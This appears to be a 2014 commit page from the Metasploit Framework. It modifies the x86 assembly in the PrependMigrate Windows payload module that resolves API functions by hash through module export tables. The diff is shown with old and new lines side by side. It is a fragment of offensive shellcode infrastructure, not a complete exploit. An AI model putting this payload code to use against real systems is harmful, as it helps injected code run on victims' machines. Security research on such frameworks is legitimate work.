Add block_api changes to prepend_migrate

bug/bundler_fix
James Lee 2014-02-05 15:32:59 -06:00
parent 14aa8ffd5c
commit b226ecf591
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 13 additions and 8 deletions


@ -85,21 +85,24 @@ module Msf::Payload::Windows::PrependMigrate
ror edi, 13 ; Rotate right our hash value ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed ; We now have the module hash computed
push edx ; Save the current position in the module list for later push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later push edi ; Save the current module hash for later
; Proceed to iterate the export address table ; Proceed to iterate the export address table
mov edx, [edx+16] ; Get this modules base address mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA ; use ecx as our EAT pointer here so we can take advantage of jecxz.
test eax, eax ; Test if no export address table is present mov ecx, [eax+edx+120] ; Get the EAT from the PE header
jz get_next_mod1 ; If no EAT present, process the next module jecxz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address add ecx, edx ; Add the modules base address
push eax ; Save the current modules EAT push ecx ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names mov ebx, [ecx+32] ; Get the rva of the function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash ; Computing the module hash + function hash
get_next_func: ; get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
@ -118,6 +121,7 @@ module Msf::Payload::Windows::PrependMigrate
add edi, [ebp-8] ; Add the current module hash to the function hash add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one... ; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva mov ebx, [eax+36] ; Get the ordinal table rva
@ -138,6 +142,7 @@ module Msf::Payload::Windows::PrependMigrate
push ecx ; Push back the correct return value push ecx ; Push back the correct return value
jmp eax ; Jump into the required function jmp eax ; Jump into the required function
; We now automagically return to the correct caller... ; We now automagically return to the correct caller...
get_next_mod: ; get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ; get_next_mod1: ;